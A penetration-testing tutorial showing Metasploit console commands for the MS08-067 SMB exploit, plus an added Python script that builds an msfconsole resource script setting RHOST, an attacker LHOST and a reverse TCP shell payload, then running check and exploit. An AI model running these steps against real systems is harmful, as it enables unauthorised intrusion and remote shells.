After covering the intelligence gathering phase and vulnerability
scanning in my previous tutorials, we now turn to the basics of
exploitation. Exploits operate against the vulnerabilities that
you discover during a penetration test.
Here we show how using the Framework for exploit development lets
you concentrate on what is unique about the exploit, while leaving
other matters such as payload selection, encoding and NOP generation
to the Framework.
The Metasploit Framework contains hundreds of modules, and it's nearly
impossible to remember them all. Running show followed by a module type
from msfconsole lists every module of that type in the Framework:
msf > show exploits
This command displays every currently available exploit module within
the Framework.
msf > show options
When you run show options while a module is selected,
Metasploit displays only the options that apply to that particular
module.
Now let's start with an example.
Open msfconsole (type msfconsole in a terminal). When msfconsole is loaded,
if you want to find modules for attacking Microsoft SQL Server, type:
msf > search mssql
Or, to find the MS08-067 exploit specifically:
msf > search ms08_067
Then, having found an exploit, load the module with
the use command:
msf > use windows/smb/ms08_067_netapi
Now enter show options to display the options specific to the
MS08-067 exploit:
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) >
As you can see, this exploit requires the target's IP address: RHOST is
marked Required but has no current setting, and the module will not run
until it is set. Set RHOST to the target IP address (192.168.1.1 in this
example):
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
Running show options again now shows the value in place:
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.1      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) >
As you can see, your target is now set.
msf > show payloads
As with show options, when you run show payloads from a
module-specific prompt, Metasploit displays only the payloads that are
compatible with that module.
To see the full list of payloads, run show payloads from the top-level
msf prompt:
msf > show payloads
From inside an exploit module you will see only the payloads applicable
to that attack.
For example, running show payloads from the msf exploit(ms08_067_netapi)
prompt results in the output shown next.
msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                Rank    Description
   ----                                ----    -----------
   . . . SNIP . . .
   windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP Inline
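The steps above (show options, spot the Required option that is still empty, set it, pick a compatible payload) are what you end up scripting once you run the same module against more than one host. Below is an added example, not code from the original post or from the Metasploit project: a small Python script that parses the fixed-width show options table as msfconsole prints it, reports which Required options are still unset (RHOST in the first listing above), and then writes an msfconsole resource script that sets the options, runs check and then exploit -z. The sample table embedded in the script is constructed from the output quoted above; the attacker address 192.168.1.50, the use of the module's full path exploit/windows/smb/ms08_067_netapi, and the rule that a payload with "reverse" in its name needs LHOST are assumptions made for this example.

```python
"""Added example (not from the original post): parse the `show options` table
msfconsole prints, find required options that are still unset, and build an
msfconsole resource script that sets them, runs `check`, then `exploit`."""
import ipaddress
import re

# Constructed sample: the `show options` output quoted above, before RHOST is set.
# The table is fixed-width, so an empty "Current Setting" cell is just whitespace.
SHOW_OPTIONS_OUTPUT = """\
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
"""


def parse_options(text):
    """Return {name: {"current": str, "required": bool, "description": str}}
    from the first table whose header row has a Required column."""
    lines = text.splitlines()
    options = {}
    for i in range(1, len(lines)):
        header, dashes = lines[i - 1], lines[i]
        if not (dashes.strip().startswith("----") and "Required" in header):
            continue
        # Column boundaries come from the dash runs, not from splitting on
        # whitespace, so an empty cell does not shift the columns to its right.
        starts = [m.start() for m in re.finditer(r"-+", dashes)]
        bounds = list(zip(starts, starts[1:] + [None]))
        cols = [header[s:e].strip() for s, e in bounds]
        for row in lines[i + 1:]:
            if not row.strip():
                break  # a blank line ends the table
            cells = dict(zip(cols, (row[s:e].strip() for s, e in bounds)))
            options[cells["Name"]] = {
                "current": cells.get("Current Setting", ""),
                "required": cells.get("Required", "").lower() == "yes",
                "description": cells.get("Description", ""),
            }
        break
    return options


def missing_required(options):
    """Names of options marked Required whose Current Setting is empty."""
    return sorted(n for n, o in options.items() if o["required"] and not o["current"])


def build_resource_script(module, payload, settings, options):
    """Emit an msfconsole resource script (run it with `msfconsole -q -r file.rc`).

    Refuses to emit a script that would fail at runtime: a required module option
    still unset after `settings` is applied, a reverse-connect payload with no
    LHOST, or a malformed RHOST.
    """
    merged = {name: opt["current"] for name, opt in options.items()}
    merged.update(settings)
    missing = [n for n, o in options.items() if o["required"] and not merged.get(n)]
    # Heuristic (an assumption for this example, not a Metasploit rule): payloads
    # with "reverse" in the name connect back to the attacker and so need LHOST.
    if "reverse" in payload and not merged.get("LHOST"):
        missing.append("LHOST")
    if missing:
        raise ValueError("unset required options: " + ", ".join(sorted(missing)))
    if "RHOST" in settings:
        ipaddress.ip_address(settings["RHOST"])  # raises ValueError if malformed
    lines = [f"use {module}", f"set PAYLOAD {payload}"]
    lines += [f"set {name} {value}" for name, value in sorted(settings.items())]
    lines += ["check", "exploit -z"]  # check first; -z: do not interact with a session
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    opts = parse_options(SHOW_OPTIONS_OUTPUT)
    print("unset required options:", missing_required(opts))  # ['RHOST']
    # 192.168.1.50 is a constructed attacker address for the example.
    print(build_resource_script("exploit/windows/smb/ms08_067_netapi",
                                "windows/shell/reverse_tcp",
                                {"RHOST": "192.168.1.1", "LHOST": "192.168.1.50"}, opts))
```

Run it with python3 to print the resource script, save that output to a file and feed it to msfconsole -q -r. Reading the columns from the positions of the dash runs, rather than splitting on whitespace, is what keeps the empty Current Setting cell of RHOST from shifting "yes" into the wrong column; a whitespace split would silently report RHOST as set to "yes".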